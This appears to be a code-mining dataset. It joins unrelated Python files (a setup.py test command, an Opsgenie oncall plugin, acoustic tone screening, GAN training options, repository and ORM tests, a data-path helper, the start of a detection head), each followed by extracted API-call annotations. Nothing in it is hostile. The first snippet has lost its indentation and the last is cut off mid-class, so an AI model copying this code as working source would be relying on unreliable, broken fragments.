user_options = [('pytest-args=', 'a', "Arguments to pass to py.test")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ["tests"]
def finalize_options(self):
# pylint: disable=W0201
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
        # import here, because outside the eggs aren't loaded
import pytest
errno = pytest.main(self.pytest_args)
sys.exit(errno)
setup(
name="MongoRS",
version="0.0.1",
package_dir={'': 'src'},
namespace_packages=[],
packages=find_packages(
'src',
exclude=[]
),
entry_points={
"console_scripts": [
"mongors = mongors.scripts:cli"
]
},
install_requires=[
"pymongo",
"click",
"gevent",
"simplejson",
],
cmdclass={'test': PyTest},
tests_require=[
# tests
'pytest',
'pytest-pep8',
]
)
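
# Usage sketch (assumed workflow; the test path below is hypothetical):
#   pip install -e .                                 # install the package from src/
#   python setup.py test                             # run py.test via the PyTest command above
#   python setup.py test -a "tests/test_foo.py -x"   # forward extra arguments to py.test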
|
[
"pytest.main",
"setuptools.command.test.test.finalize_options",
"sys.exit",
"setuptools.command.test.test.initialize_options",
"setuptools.find_packages"
] |
[((308, 344), 'setuptools.command.test.test.initialize_options', 'TestCommand.initialize_options', (['self'], {}), '(self)\n', (338, 344), True, 'from setuptools.command.test import test as TestCommand\n'), ((455, 489), 'setuptools.command.test.test.finalize_options', 'TestCommand.finalize_options', (['self'], {}), '(self)\n', (483, 489), True, 'from setuptools.command.test import test as TestCommand\n'), ((673, 702), 'pytest.main', 'pytest.main', (['self.pytest_args'], {}), '(self.pytest_args)\n', (684, 702), False, 'import pytest\n'), ((711, 726), 'sys.exit', 'sys.exit', (['errno'], {}), '(errno)\n', (719, 726), False, 'import sys\n'), ((847, 879), 'setuptools.find_packages', 'find_packages', (['"""src"""'], {'exclude': '[]'}), "('src', exclude=[])\n", (860, 879), False, 'from setuptools import setup, find_packages\n')]
|
"""
.. module: dispatch.plugins.dispatch_opsgenie.plugin
:platform: Unix
:copyright: (c) 2019 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
"""
import logging
from pydantic import Field, SecretStr
from dispatch.config import BaseConfigurationModel
from dispatch.decorators import apply, counter, timer
from dispatch.plugins.bases import OncallPlugin
from .service import get_oncall, page_oncall
__version__ = "0.1.0"
log = logging.getLogger(__name__)
class OpsgenieConfiguration(BaseConfigurationModel):
"""Opsgenie configuration description."""
api_key: SecretStr = Field(
title="API Key", description="This is the key used to talk to the Opsgenine API."
)
@apply(counter, exclude=["__init__"])
@apply(timer, exclude=["__init__"])
class OpsGenieOncallPlugin(OncallPlugin):
title = "OpsGenie Plugin - Oncall Management"
slug = "opsgenie-oncall"
author = "stefanm8"
author_url = "https://github.com/Netflix/dispatch"
description = "Uses Opsgenie to resolve and page oncall teams."
version = __version__
def __init__(self):
self.configuration_schema = OpsgenieConfiguration
def get(self, service_id: str, **kwargs):
return get_oncall(self.configuration.api_key, service_id)
def page(
self,
service_id: str,
incident_name: str,
incident_title: str,
incident_description: str,
**kwargs,
):
return page_oncall(
self.configuration.api_key,
service_id,
incident_name,
incident_title,
incident_description,
)
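
# --- Usage sketch (illustrative; the service id and API key are placeholders,
# and in practice the configuration is supplied by Dispatch's plugin framework):
#
#   plugin = OpsGenieOncallPlugin()
#   plugin.configuration = OpsgenieConfiguration(api_key="<opsgenie-api-key>")
#   plugin.get("oncall-schedule-id")            # resolve the current oncall person
#   plugin.page("oncall-schedule-id", "incident-1", "Title", "Description")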
|
[
"pydantic.Field",
"dispatch.decorators.apply",
"logging.getLogger"
] |
[((481, 508), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (498, 508), False, 'import logging\n'), ((742, 778), 'dispatch.decorators.apply', 'apply', (['counter'], {'exclude': "['__init__']"}), "(counter, exclude=['__init__'])\n", (747, 778), False, 'from dispatch.decorators import apply, counter, timer\n'), ((780, 814), 'dispatch.decorators.apply', 'apply', (['timer'], {'exclude': "['__init__']"}), "(timer, exclude=['__init__'])\n", (785, 814), False, 'from dispatch.decorators import apply, counter, timer\n'), ((636, 729), 'pydantic.Field', 'Field', ([], {'title': '"""API Key"""', 'description': '"""This is the key used to talk to the Opsgenine API."""'}), "(title='API Key', description=\n 'This is the key used to talk to the Opsgenine API.')\n", (641, 729), False, 'from pydantic import Field, SecretStr\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 16 20:23:01 2020
@author: wantysal
"""
# Standard library imports
import numpy as np
# Mosqito functions import
from mosqito.sq_metrics.tonality.tone_to_noise_ecma._spectrum_smoothing import _spectrum_smoothing
from mosqito.sq_metrics.tonality.tone_to_noise_ecma._LTH import _LTH
from mosqito.sq_metrics.tonality.tone_to_noise_ecma._critical_band import _critical_band
def _screening_for_tones(freqs, spec_db, method, low_freq, high_freq):
"""
    Screening function to find the tonal candidates in a spectrum.
    The 'smoothed' method is the one described by <NAME> and <NAME> in:
    Automating prominent tone evaluations and accounting for time-varying
    conditions, Sound Quality Symposium, SQS 2008, Detroit, 2008.
    The 'not-smoothed' method is the one used by Aures and Terhardt.
    The tonal-width criterion comes from Wade Bray in 'Methods for automating
    prominent tone evaluation and for considering variations with time or other
    reference quantities'.
Parameters
----------
freqs : numpy.array
frequency axis (n blocks x frequency axis)
spec_db : numpy.array
spectrum in dB (n block x spectrum)
method : string
        the method chosen to find the tones, either 'smoothed' or 'not-smoothed'
low_freq : float
lowest frequency of interest
high_freq : float
highest frequency of interest
Returns
-------
tones : list
list of index corresponding to the potential tonal components
"""
###############################################################################
# Detection of the tonal candidates according to their level
# Creation of the smoothed spectrum
smooth_spec = _spectrum_smoothing(freqs, spec_db.T, 24, low_freq, high_freq, freqs).T
n = spec_db.shape[0]
    if len(spec_db.shape) > 1:
        m = spec_db.shape[1]
        stop = np.arange(1, n + 1) * m - 1
else:
m = spec_db.shape[0]
n = 1
stop = [m]
smooth_spec = smooth_spec.ravel()
spec_db = spec_db.ravel()
freqs = freqs.ravel()
if method == "smoothed":
# Criteria 1 : the level of the spectral line is higher than the level of
# the two neighboring lines
maxima = (np.diff(np.sign(np.diff(spec_db))) < 0).nonzero()[0] + 1
# Criteria 2 : the level of the spectral line exceeds the corresponding lines
# of the 1/24 octave smoothed spectrum by at least 6 dB
indexx = np.where(spec_db[maxima] > smooth_spec[maxima] + 6)[0]
# Criteria 3 : the level of the spectral line exceeds the threshold of hearing
threshold = _LTH(freqs)
audible = np.where(spec_db[maxima][indexx] > threshold[maxima][indexx] + 10)[0]
index = np.arange(0, len(spec_db))[maxima][indexx][audible]
if method == "not-smoothed":
# Criteria 1 : the level of the spectral line is higher than the level of
# the two neighboring lines
maxima = (
np.diff(np.sign(np.diff(spec_db[3 : len(spec_db) - 3]))) < 0
).nonzero()[
0
] + 1 # local max
# Criteria 2 : the level of the spectral line is at least 7 dB higher than its
# +/- 2,3 neighbors
indexx = np.where(
(spec_db[maxima] > (spec_db[maxima + 2] + 7))
& (spec_db[maxima] > (spec_db[maxima - 2] + 7))
& (spec_db[maxima] > (spec_db[maxima + 3] + 7))
& (spec_db[maxima] > (spec_db[maxima - 3] + 7))
)[0]
# Criteria 3 : the level of the spectral line exceeds the threshold of hearing
threshold = _LTH(freqs)
audible = np.where(spec_db[maxima][indexx] > threshold[maxima][indexx] + 10)[0]
index = np.arange(0, len(spec_db))[maxima][indexx][audible]
###############################################################################
# Check of the tones width : a candidate is discarded if its width is greater
# than half the critical bandwidth
if n == 1:
tones = []
else:
        tones = [[] for i in range(n)]
# Each candidate is evaluated
while len(index) > 0:
# Index of the candidate
peak_index = index[0]
for i in range(n):
            if (peak_index < stop[i]) and (peak_index > stop[i] - m):
block = i
# Lower and higher limits of the tone width
low_limit = peak_index
high_limit = peak_index
# Screen the right points of the peak
temp = peak_index + 1
# As long as the level decreases or remains above the smoothed spectrum,
while (spec_db[temp] > smooth_spec[temp] + 6) and (temp + 1 < (block+1)*m):
# if a highest spectral line is found, it becomes the candidate
if spec_db[temp] > spec_db[peak_index]:
peak_index = temp
high_limit += 1
temp += 1
# Screen the left points of the peak
temp = peak_index - 1
        # As long as the level remains above the smoothed spectrum,
        while (spec_db[temp] > smooth_spec[temp] + 6) and (temp + 1 > block * m):
# if a highest spectral line is found, it becomes the candidate
if spec_db[temp] > spec_db[peak_index]:
peak_index = temp
low_limit -= 1
temp -= 1
# Critical bandwidth
f1, f2 = _critical_band(freqs[peak_index])
cb_width = f2 - f1
# Tonal width
t_width = freqs[high_limit] - freqs[low_limit]
if t_width < cb_width:
if n>1:
tones[block] = np.append(tones[block], peak_index - block*m)
else:
tones = np.append(tones, peak_index )
# All the candidates already screened are deleted from the list
sup = np.where(index <= high_limit)[0]
index = np.delete(index, sup)
tones = np.asarray(tones, dtype=object)
return tones
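

# --- Usage sketch (illustrative; array shapes follow the docstring above):
#   freqs = np.arange(10, 10000, 10.0)     # 1-D frequency axis in Hz
#   spec_db = 20 * np.ones_like(freqs)     # flat 20 dB noise floor
#   spec_db[100] = 60                      # artificial tone at 1010 Hz
#   tones = _screening_for_tones(freqs, spec_db, "smoothed", 90, 11200)
#   # 'tones' then holds the spectrum indices of the surviving tonal candidates.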
|
[
"mosqito.sq_metrics.tonality.tone_to_noise_ecma._critical_band._critical_band",
"mosqito.sq_metrics.tonality.tone_to_noise_ecma._LTH._LTH",
"numpy.asarray",
"numpy.append",
"numpy.where",
"numpy.arange",
"numpy.diff",
"mosqito.sq_metrics.tonality.tone_to_noise_ecma._spectrum_smoothing._spectrum_smoothing",
"numpy.delete"
] |
[((5967, 5998), 'numpy.asarray', 'np.asarray', (['tones'], {'dtype': 'object'}), '(tones, dtype=object)\n', (5977, 5998), True, 'import numpy as np\n'), ((1765, 1834), 'mosqito.sq_metrics.tonality.tone_to_noise_ecma._spectrum_smoothing._spectrum_smoothing', '_spectrum_smoothing', (['freqs', 'spec_db.T', '(24)', 'low_freq', 'high_freq', 'freqs'], {}), '(freqs, spec_db.T, 24, low_freq, high_freq, freqs)\n', (1784, 1834), False, 'from mosqito.sq_metrics.tonality.tone_to_noise_ecma._spectrum_smoothing import _spectrum_smoothing\n'), ((2711, 2722), 'mosqito.sq_metrics.tonality.tone_to_noise_ecma._LTH._LTH', '_LTH', (['freqs'], {}), '(freqs)\n', (2715, 2722), False, 'from mosqito.sq_metrics.tonality.tone_to_noise_ecma._LTH import _LTH\n'), ((3688, 3699), 'mosqito.sq_metrics.tonality.tone_to_noise_ecma._LTH._LTH', '_LTH', (['freqs'], {}), '(freqs)\n', (3692, 3699), False, 'from mosqito.sq_metrics.tonality.tone_to_noise_ecma._LTH import _LTH\n'), ((5452, 5485), 'mosqito.sq_metrics.tonality.tone_to_noise_ecma._critical_band._critical_band', '_critical_band', (['freqs[peak_index]'], {}), '(freqs[peak_index])\n', (5466, 5485), False, 'from mosqito.sq_metrics.tonality.tone_to_noise_ecma._critical_band import _critical_band\n'), ((5928, 5949), 'numpy.delete', 'np.delete', (['index', 'sup'], {}), '(index, sup)\n', (5937, 5949), True, 'import numpy as np\n'), ((2548, 2599), 'numpy.where', 'np.where', (['(spec_db[maxima] > smooth_spec[maxima] + 6)'], {}), '(spec_db[maxima] > smooth_spec[maxima] + 6)\n', (2556, 2599), True, 'import numpy as np\n'), ((2741, 2807), 'numpy.where', 'np.where', (['(spec_db[maxima][indexx] > threshold[maxima][indexx] + 10)'], {}), '(spec_db[maxima][indexx] > threshold[maxima][indexx] + 10)\n', (2749, 2807), True, 'import numpy as np\n'), ((3319, 3519), 'numpy.where', 'np.where', (['((spec_db[maxima] > spec_db[maxima + 2] + 7) & (spec_db[maxima] > spec_db[\n maxima - 2] + 7) & (spec_db[maxima] > spec_db[maxima + 3] + 7) & (\n spec_db[maxima] > spec_db[maxima - 3] + 7))'], {}), '((spec_db[maxima] > spec_db[maxima + 2] + 7) & (spec_db[maxima] > \n spec_db[maxima - 2] + 7) & (spec_db[maxima] > spec_db[maxima + 3] + 7) &\n (spec_db[maxima] > spec_db[maxima - 3] + 7))\n', (3327, 3519), True, 'import numpy as np\n'), ((3718, 3784), 'numpy.where', 'np.where', (['(spec_db[maxima][indexx] > threshold[maxima][indexx] + 10)'], {}), '(spec_db[maxima][indexx] > threshold[maxima][indexx] + 10)\n', (3726, 3784), True, 'import numpy as np\n'), ((5879, 5908), 'numpy.where', 'np.where', (['(index <= high_limit)'], {}), '(index <= high_limit)\n', (5887, 5908), True, 'import numpy as np\n'), ((1946, 1965), 'numpy.arange', 'np.arange', (['(1)', '(n + 1)'], {}), '(1, n + 1)\n', (1955, 1965), True, 'import numpy as np\n'), ((5674, 5721), 'numpy.append', 'np.append', (['tones[block]', '(peak_index - block * m)'], {}), '(tones[block], peak_index - block * m)\n', (5683, 5721), True, 'import numpy as np\n'), ((5762, 5790), 'numpy.append', 'np.append', (['tones', 'peak_index'], {}), '(tones, peak_index)\n', (5771, 5790), True, 'import numpy as np\n'), ((2339, 2355), 'numpy.diff', 'np.diff', (['spec_db'], {}), '(spec_db)\n', (2346, 2355), True, 'import numpy as np\n')]
|
import argparse
import os
from util import util
import torch
class BaseOptions():
def __init__(self):
self.parser = argparse.ArgumentParser()
self.initialized = False
def initialize(self):
self.parser.add_argument('--dataroot', type=str, default="/content/DeblurGAN/input_img/", help='path to images (should have subfolders trainA, trainB, valA, valB, etc)')
self.parser.add_argument('--batchSize', type=int, default=1, help='input batch size')
self.parser.add_argument('--loadSizeX', type=int, default=640, help='scale images to this size')
self.parser.add_argument('--loadSizeY', type=int, default=360, help='scale images to this size')
self.parser.add_argument('--fineSize', type=int, default=256, help='then crop to this size')
self.parser.add_argument('--input_nc', type=int, default=3, help='# of input image channels')
self.parser.add_argument('--output_nc', type=int, default=3, help='# of output image channels')
self.parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in first conv layer')
self.parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in first conv layer')
self.parser.add_argument('--which_model_netD', type=str, default='basic', help='selects model to use for netD')
self.parser.add_argument('--which_model_netG', type=str, default='resnet_9blocks', help='selects model to use for netG')
self.parser.add_argument('--learn_residual', action='store_true', help='if specified, model would learn only the residual to the input')
self.parser.add_argument('--gan_type', type=str, default='wgan-gp', help='wgan-gp : Wasserstein GAN with Gradient Penalty, lsgan : Least Sqaures GAN, gan : Vanilla GAN')
self.parser.add_argument('--n_layers_D', type=int, default=3, help='only used if which_model_netD==n_layers')
self.parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
self.parser.add_argument('--name', type=str, default='experiment_name', help='name of the experiment. It decides where to store samples and models')
self.parser.add_argument('--dataset_mode', type=str, default='aligned', help='chooses how datasets are loaded. [unaligned | aligned | single]')
self.parser.add_argument('--model', type=str, default='content_gan', help='chooses which model to use. pix2pix, test, content_gan')
self.parser.add_argument('--which_direction', type=str, default='AtoB', help='AtoB or BtoA')
self.parser.add_argument('--nThreads', default=2, type=int, help='# threads for loading data')
self.parser.add_argument('--checkpoints_dir', type=str, default='./checkpoints', help='models are saved here')
self.parser.add_argument('--norm', type=str, default='instance', help='instance normalization or batch normalization')
self.parser.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly')
self.parser.add_argument('--display_winsize', type=int, default=256, help='display window size')
self.parser.add_argument('--display_id', type=int, default=1, help='window id of the web display')
self.parser.add_argument('--display_port', type=int, default=8097, help='visdom port of the web display')
self.parser.add_argument('--display_single_pane_ncols', type=int, default=0, help='if positive, display all images in a single visdom web panel with certain number of images per row.')
self.parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator')
self.parser.add_argument('--max_dataset_size', type=int, default=float("inf"), help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.')
self.parser.add_argument('--resize_or_crop', type=str, default='resize_and_crop', help='scaling and cropping of images at load time [resize_and_crop|crop|scale_width|scale_width_and_crop]')
self.parser.add_argument('--no_flip', action='store_true', help='if specified, do not flip the images for data augmentation')
self.initialized = True
def parse(self):
if not self.initialized:
self.initialize()
self.opt = self.parser.parse_args()
self.opt.isTrain = self.isTrain # train or test
str_ids = self.opt.gpu_ids.split(',')
self.opt.gpu_ids = []
for str_id in str_ids:
id = int(str_id)
if id >= 0:
self.opt.gpu_ids.append(id)
# set gpu ids
if len(self.opt.gpu_ids) > 0:
torch.cuda.set_device(self.opt.gpu_ids[0])
args = vars(self.opt)
print('------------ Options -------------')
for k, v in sorted(args.items()):
print('%s: %s' % (str(k), str(v)))
print('-------------- End ----------------')
# save to the disk
expr_dir = os.path.join(self.opt.checkpoints_dir, self.opt.name)
util.mkdirs(expr_dir)
file_name = os.path.join(expr_dir, 'opt.txt')
with open(file_name, 'wt') as opt_file:
opt_file.write('------------ Options -------------\n')
for k, v in sorted(args.items()):
opt_file.write('%s: %s\n' % (str(k), str(v)))
opt_file.write('-------------- End ----------------\n')
return self.opt
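
# --- Usage sketch (assumed subclassing pattern; TrainOptions is not part of
# this file): parse() expects `self.isTrain` to be set by a subclass.
#
#   class TrainOptions(BaseOptions):
#       def initialize(self):
#           BaseOptions.initialize(self)
#           self.isTrain = True
#
#   opt = TrainOptions().parse()   # parses sys.argv, prints and saves the options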
|
[
"torch.cuda.set_device",
"os.path.join",
"argparse.ArgumentParser",
"util.util.mkdirs"
] |
[((120, 145), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (143, 145), False, 'import argparse\n'), ((4744, 4797), 'os.path.join', 'os.path.join', (['self.opt.checkpoints_dir', 'self.opt.name'], {}), '(self.opt.checkpoints_dir, self.opt.name)\n', (4756, 4797), False, 'import os\n'), ((4800, 4821), 'util.util.mkdirs', 'util.mkdirs', (['expr_dir'], {}), '(expr_dir)\n', (4811, 4821), False, 'from util import util\n'), ((4836, 4869), 'os.path.join', 'os.path.join', (['expr_dir', '"""opt.txt"""'], {}), "(expr_dir, 'opt.txt')\n", (4848, 4869), False, 'import os\n'), ((4473, 4515), 'torch.cuda.set_device', 'torch.cuda.set_device', (['self.opt.gpu_ids[0]'], {}), '(self.opt.gpu_ids[0])\n', (4494, 4515), False, 'import torch\n')]
|
import pytest
from rentomatic.repository.postgres_objects import Room
from rentomatic.repository import postgresrepo
pytestmark = pytest.mark.integration
def test_repository_list_without_parameters(docker_setup, pg_data, pg_session):
repo = postgresrepo.PostgresRepo(docker_setup['postgres'])
repo_rooms = repo.list()
assert set([r.code for r in repo_rooms]) == set(
[r['code'] for r in pg_data])
def test_repository_list_with_price_equal_filter(docker_setup, pg_data, pg_session):
repo = postgresrepo.PostgresRepo(docker_setup['postgres'])
repo_rooms = repo.list(
filters={'price__eq': 60}
)
assert len(repo_rooms) == 1
assert repo_rooms[0].code == '913694c6-435a-4366-ba0d-da5334a611b2'
def test_repository_list_with_price_less_than_filter(docker_setup, pg_data, pg_session):
repo = postgresrepo.PostgresRepo(docker_setup['postgres'])
repo_rooms = repo.list(filters={
'price__lt': 60
})
assert len(repo_rooms) == 2
assert set([r.code for r in repo_rooms]) == {
'f853578c-fc0f-4e65-81b8-566c5dffa35a',
'eed76e77-55c1-41ce-985d-ca49bf6c0585'
}
def test_repository_list_with_price_greater_than_filter(
docker_setup, pg_data, pg_session):
repo = postgresrepo.PostgresRepo(docker_setup['postgres'])
repo_rooms = repo.list(
filters={'price__gt': 48}
)
assert len(repo_rooms) == 2
assert set([r.code for r in repo_rooms]) == {
'913694c6-435a-4366-ba0d-da5334a611b2',
'fe2c3195-aeff-487a-a08f-e0bdc0ec6e9a'
}
def test_repository_list_with_price_between_filter(
docker_setup, pg_data, pg_session):
repo = postgresrepo.PostgresRepo(docker_setup['postgres'])
repo_rooms = repo.list(
filters={
'price__lt': 66,
'price__gt': 48
}
)
assert len(repo_rooms) == 1
assert repo_rooms[0].code == '913694c6-435a-4366-ba0d-da5334a611b2'
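
# A note on the filter grammar exercised above (assumed Django-style keys):
#   repo.list(filters={'price__eq': 60})                     # price == 60
#   repo.list(filters={'price__lt': 66, 'price__gt': 48})    # 48 < price < 66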
|
[
"rentomatic.repository.postgresrepo.PostgresRepo"
] |
[((249, 300), 'rentomatic.repository.postgresrepo.PostgresRepo', 'postgresrepo.PostgresRepo', (["docker_setup['postgres']"], {}), "(docker_setup['postgres'])\n", (274, 300), False, 'from rentomatic.repository import postgresrepo\n'), ((521, 572), 'rentomatic.repository.postgresrepo.PostgresRepo', 'postgresrepo.PostgresRepo', (["docker_setup['postgres']"], {}), "(docker_setup['postgres'])\n", (546, 572), False, 'from rentomatic.repository import postgresrepo\n'), ((849, 900), 'rentomatic.repository.postgresrepo.PostgresRepo', 'postgresrepo.PostgresRepo', (["docker_setup['postgres']"], {}), "(docker_setup['postgres'])\n", (874, 900), False, 'from rentomatic.repository import postgresrepo\n'), ((1268, 1319), 'rentomatic.repository.postgresrepo.PostgresRepo', 'postgresrepo.PostgresRepo', (["docker_setup['postgres']"], {}), "(docker_setup['postgres'])\n", (1293, 1319), False, 'from rentomatic.repository import postgresrepo\n'), ((1682, 1733), 'rentomatic.repository.postgresrepo.PostgresRepo', 'postgresrepo.PostgresRepo', (["docker_setup['postgres']"], {}), "(docker_setup['postgres'])\n", (1707, 1733), False, 'from rentomatic.repository import postgresrepo\n')]
|
import pytest
import sqlalchemy as sa
from sqlalchemy.orm import dynamic_loader
from sqlalchemy_utils.observer import observes
@pytest.fixture
def Director(Base):
class Director(Base):
__tablename__ = 'director'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.String)
movies = dynamic_loader('Movie', back_populates='director')
return Director
@pytest.fixture
def Movie(Base, Director):
class Movie(Base):
__tablename__ = 'movie'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.String)
director_id = sa.Column(sa.Integer, sa.ForeignKey(Director.id))
director = sa.orm.relationship(Director, back_populates='movies')
director_name = sa.Column(sa.String)
@observes('director')
def director_observer(self, director):
self.director_name = director.name
return Movie
@pytest.fixture
def init_models(Director, Movie):
pass
@pytest.mark.usefixtures('postgresql_dsn')
class TestObservesForDynamicRelationship:
def test_add_observed_object(self, session, Director, Movie):
steven = Director(name='<NAME>')
session.add(steven)
jaws = Movie(name='Jaws', director=steven)
session.add(jaws)
session.commit()
assert jaws.director_name == '<NAME>'
def test_add_observed_object_from_backref(self, session, Director, Movie):
jaws = Movie(name='Jaws')
steven = Director(name='<NAME>', movies=[jaws])
session.add(steven)
session.add(jaws)
session.commit()
assert jaws.director_name == '<NAME>'
|
[
"sqlalchemy_utils.observer.observes",
"sqlalchemy.orm.dynamic_loader",
"sqlalchemy.ForeignKey",
"sqlalchemy.orm.relationship",
"sqlalchemy.Column",
"pytest.mark.usefixtures"
] |
[((992, 1033), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""postgresql_dsn"""'], {}), "('postgresql_dsn')\n", (1015, 1033), False, 'import pytest\n'), ((240, 279), 'sqlalchemy.Column', 'sa.Column', (['sa.Integer'], {'primary_key': '(True)'}), '(sa.Integer, primary_key=True)\n', (249, 279), True, 'import sqlalchemy as sa\n'), ((295, 315), 'sqlalchemy.Column', 'sa.Column', (['sa.String'], {}), '(sa.String)\n', (304, 315), True, 'import sqlalchemy as sa\n'), ((333, 383), 'sqlalchemy.orm.dynamic_loader', 'dynamic_loader', (['"""Movie"""'], {'back_populates': '"""director"""'}), "('Movie', back_populates='director')\n", (347, 383), False, 'from sqlalchemy.orm import dynamic_loader\n'), ((518, 557), 'sqlalchemy.Column', 'sa.Column', (['sa.Integer'], {'primary_key': '(True)'}), '(sa.Integer, primary_key=True)\n', (527, 557), True, 'import sqlalchemy as sa\n'), ((573, 593), 'sqlalchemy.Column', 'sa.Column', (['sa.String'], {}), '(sa.String)\n', (582, 593), True, 'import sqlalchemy as sa\n'), ((685, 739), 'sqlalchemy.orm.relationship', 'sa.orm.relationship', (['Director'], {'back_populates': '"""movies"""'}), "(Director, back_populates='movies')\n", (704, 739), True, 'import sqlalchemy as sa\n'), ((764, 784), 'sqlalchemy.Column', 'sa.Column', (['sa.String'], {}), '(sa.String)\n', (773, 784), True, 'import sqlalchemy as sa\n'), ((795, 815), 'sqlalchemy_utils.observer.observes', 'observes', (['"""director"""'], {}), "('director')\n", (803, 815), False, 'from sqlalchemy_utils.observer import observes\n'), ((638, 664), 'sqlalchemy.ForeignKey', 'sa.ForeignKey', (['Director.id'], {}), '(Director.id)\n', (651, 664), True, 'import sqlalchemy as sa\n')]
|
import click
import json
import os
from xdg import XDG_CONFIG_HOME
class InvalidDataDirException(Exception):
pass
def get_data_dir():
if os.environ.get('NLGEVAL_DATA'):
if not os.path.exists(os.environ.get('NLGEVAL_DATA')):
click.secho("NLGEVAL_DATA variable is set but points to non-existent path.", fg='red', err=True)
raise InvalidDataDirException()
return os.environ.get('NLGEVAL_DATA')
else:
try:
cfg_file = os.path.join(XDG_CONFIG_HOME, 'nlgeval', 'rc.json')
with open(cfg_file, 'rt') as f:
rc = json.load(f)
if not os.path.exists(rc['data_path']):
click.secho("Data path found in {} does not exist: {} " % (cfg_file, rc['data_path']), fg='red', err=True)
click.secho("Run `nlg-eval --setup DATA_DIR' to download or set $NLGEVAL_DATA to an existing location",
fg='red', err=True)
raise InvalidDataDirException()
return rc['data_path']
        except Exception:
click.secho("Could not determine location of data.", fg='red', err=True)
click.secho("Run `nlg-eval --setup DATA_DIR' to download or set $NLGEVAL_DATA to an existing location", fg='red',
err=True)
raise InvalidDataDirException()
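

# --- Usage sketch (illustrative; the path below is a placeholder):
#   os.environ['NLGEVAL_DATA'] = '/path/to/nlgeval/data'
#   data_dir = get_data_dir()   # returns the path, or raises InvalidDataDirException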
|
[
"json.load",
"os.path.exists",
"os.environ.get",
"click.secho",
"os.path.join"
] |
[((148, 178), 'os.environ.get', 'os.environ.get', (['"""NLGEVAL_DATA"""'], {}), "('NLGEVAL_DATA')\n", (162, 178), False, 'import os\n'), ((411, 441), 'os.environ.get', 'os.environ.get', (['"""NLGEVAL_DATA"""'], {}), "('NLGEVAL_DATA')\n", (425, 441), False, 'import os\n'), ((255, 355), 'click.secho', 'click.secho', (['"""NLGEVAL_DATA variable is set but points to non-existent path."""'], {'fg': '"""red"""', 'err': '(True)'}), "('NLGEVAL_DATA variable is set but points to non-existent path.',\n fg='red', err=True)\n", (266, 355), False, 'import click\n'), ((488, 539), 'os.path.join', 'os.path.join', (['XDG_CONFIG_HOME', '"""nlgeval"""', '"""rc.json"""'], {}), "(XDG_CONFIG_HOME, 'nlgeval', 'rc.json')\n", (500, 539), False, 'import os\n'), ((210, 240), 'os.environ.get', 'os.environ.get', (['"""NLGEVAL_DATA"""'], {}), "('NLGEVAL_DATA')\n", (224, 240), False, 'import os\n'), ((605, 617), 'json.load', 'json.load', (['f'], {}), '(f)\n', (614, 617), False, 'import json\n'), ((1096, 1168), 'click.secho', 'click.secho', (['"""Could not determine location of data."""'], {'fg': '"""red"""', 'err': '(True)'}), "('Could not determine location of data.', fg='red', err=True)\n", (1107, 1168), False, 'import click\n'), ((1181, 1314), 'click.secho', 'click.secho', (['"""Run `nlg-eval --setup DATA_DIR\' to download or set $NLGEVAL_DATA to an existing location"""'], {'fg': '"""red"""', 'err': '(True)'}), '(\n "Run `nlg-eval --setup DATA_DIR\' to download or set $NLGEVAL_DATA to an existing location"\n , fg=\'red\', err=True)\n', (1192, 1314), False, 'import click\n'), ((641, 672), 'os.path.exists', 'os.path.exists', (["rc['data_path']"], {}), "(rc['data_path'])\n", (655, 672), False, 'import os\n'), ((694, 805), 'click.secho', 'click.secho', (["('Data path found in {} does not exist: {} ' % (cfg_file, rc['data_path']))"], {'fg': '"""red"""', 'err': '(True)'}), "('Data path found in {} does not exist: {} ' % (cfg_file, rc[\n 'data_path']), fg='red', err=True)\n", (705, 805), False, 'import click\n'), ((821, 954), 'click.secho', 'click.secho', (['"""Run `nlg-eval --setup DATA_DIR\' to download or set $NLGEVAL_DATA to an existing location"""'], {'fg': '"""red"""', 'err': '(True)'}), '(\n "Run `nlg-eval --setup DATA_DIR\' to download or set $NLGEVAL_DATA to an existing location"\n , fg=\'red\', err=True)\n', (832, 954), False, 'import click\n')]
|
import torch
import torch.nn as nn
from mmcv.cnn import normal_init
from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms
from ..builder import build_loss
from ..registry import HEADS
from ..utils import ConvModule, Scale, bias_init_with_prob
from IPython import embed
INF = 1e8
@HEADS.register_module
class FCOSTSHead(nn.Module):
"""
Fully Convolutional One-Stage Object Detection head from [1]_.
The FCOS head does not use anchor boxes. Instead bounding boxes are
    predicted at each pixel and a centerness measure is used to suppress
low-quality predictions.
References:
.. [1] https://arxiv.org/abs/1904.01355
Example:
        >>> self = FCOSTSHead(11, 7)
>>> feats = [torch.rand(1, 7, s, s) for s in [4, 8, 16, 32, 64]]
>>> cls_score, bbox_pred, centerness = self.forward(feats)
>>> assert len(cls_score) == len(self.scales)
"""
def __init__(self,
num_classes,
in_channels,
feat_channels=256,
stacked_convs=4,
strides=(4, 8, 16, 32, 64),
regress_ranges=((-1, 64), (64, 128), (128, 256), (256, 512),
(512, INF)),
t_s_ratio=4,
eval_student=True,
training=True,
learn_when_train=False,
align_level=1,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox=dict(type='IoULoss', loss_weight=1.0),
loss_s_t_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_s_t_reg=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_centerness=dict(
type='CrossEntropyLoss',
use_sigmoid=True,
loss_weight=1.0),
conv_cfg=None,
norm_cfg=dict(type='GN', num_groups=32, requires_grad=True)):
super(FCOSTSHead, self).__init__()
self.num_classes = num_classes
self.cls_out_channels = num_classes - 1
